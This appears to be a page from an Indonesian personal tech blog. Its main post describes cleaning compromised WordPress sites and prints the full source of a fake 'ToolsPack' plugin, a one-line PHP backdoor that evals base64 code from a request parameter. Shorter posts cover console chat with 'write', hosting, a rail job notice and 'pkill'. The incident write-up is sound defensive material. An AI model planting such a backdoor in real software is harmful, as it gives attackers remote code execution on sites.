ToolsPack Plugin di WordPress

Assalamualaikum,

Kemarin saya dapat job bersih-bersih website WordPress punya client. Ada sekitar 7 website yang harus dibersihkan dan sekaligus dipindah ke hosting lain. Dia menggunakan 1 akun untuk menjalankan 10 website lebih. Tentu saja dari segi keamanan akan lebih mudah diserang. Agar lebih mudah identifikasi script yang ditanam penyusup maka saya memindahkan semua websitenya terlebih dahulu ke hosting yang baru dan kali ini satu akun untuk satu website (dia punya akses WHM di hosting yang baru). Setelah dipindah maka saya coba buka file index.php yang ternyata telah disusupi script untuk meredirect pengunjung ke website milik penyusup. Saya reupgrade saja WordPress core pada semua website agar file-file yang diedit kembali lagi.

Setelah 1 hari dia lapor bahwa dia dapat peringatan lagi dari antivirus yang ada di komputernya bahwa website milik dia mengandung virus (maklum yang mendeteksi antivirus). Saya cek ternyata file index.php kembali diedit. Saya coba buka visitors logs di CPanel, saya cek satu-satu apa saja yang dibuka visitor. Ada 1 visitor yang beberapa kali mengunjungi file wp-content/plugins/ToolsPack/ToolsPack.php. Saya coba buka file tersebut dan isinya adalah:


<?php
 /*
 Plugin Name: ToolsPack
 Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
 Version: 1.2
 Author: Mark Stain
 Author URI: http://checkWPTools.com/
 */
 $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
 ?>

Ternyata penyusup masuk lewat sini. Langsung saja saya hapus pluginnya, saya benerin lagi file-file yang diedit dan saya masukkin IP Deny buat IP yang dipakai penyusup.

Posted in My Diary, Security | Tagged , , , , | 5 Comments

Chat Dengan User Lain Via Console

Assalamualaikum,

Sekitar tahun 2006 di sebuah pertemuan, Brainlesschild bercerita kalau dulu saat dia sedang masuk ke sebuah sistem, xnuxer tiba-tiba chatting dengan dia menggunakan console “nyusup juga ya?”.

Bagaimana caranya biar bisa chatting dengan user lain saat di console? Kita bisa gunakan perintah write. Contohnya seperti di bawah ini.

chat1 Chat Dengan User Lain Via Console

Posted in Linux, Tutorial | Tagged , , , | Leave a comment

Jualan Hosting Di Warung Burjo

wpid CameraZOOM 20120220110505477 Jualan Hosting Di Warung Burjo

A’ domain .com 1 makan sini ya icon biggrin Jualan Hosting Di Warung Burjo

417998 2589991359141 1535322362 31785073 671856812 n 225x300 Jualan Hosting Di Warung Burjo

Posted in Foto, My Diary | Tagged , , , | 4 Comments

Persyaratan dan Kriteria Rekrutmen Untuk Masinis dan PPKA Tingkat SLTA Tahun 2012

Ternyata lagi musim rekrutment masinis ya? Pantes lagi banyak yang buka websitenya rekrut.kereta-api.co.id. Cuman sayangnya websitenya lagi lelet. Bagi yang lagi nyari Persyaratan dan Kriteria Rekrutmen Untuk Masinis dan PPKA Tingkat SLTA Tahun 2012 silahkan download dari link di bawah ini.

Posted in My Diary | Tagged , , , , | Leave a comment

Kill Semua Proses Dari User Spesifik

Jika anda ingin membunuh semua proses yang berjalan pada 1 user misalkan saja user adi, anda tinggal gunakan perintah pkill.
Cara penggunaannya: sudo pkill -u adi

Posted in Linux, My Diary, Tips and Triks, Tutorial | Tagged , | Leave a comment
  • Allah Berfirman:

    Dan Dialah yang menciptakan langit dan bumi dalam enam masa, dan adalah singgasana-Nya (sebelum itu) di atas air, agar Dia menguji siapakah di antara kamu yang lebih baik amalnya, dan [+] [Hud 11:7]


  • email: adi88nugroho@gmail.com
    YM: adi88nugroho
    FB: fb.com/adi88nugroho
    Twitter: twitter.com/adi88nugroho
    Skype: adi88nugroho
  • Artikel Terbaru

  • Categories

  • Archives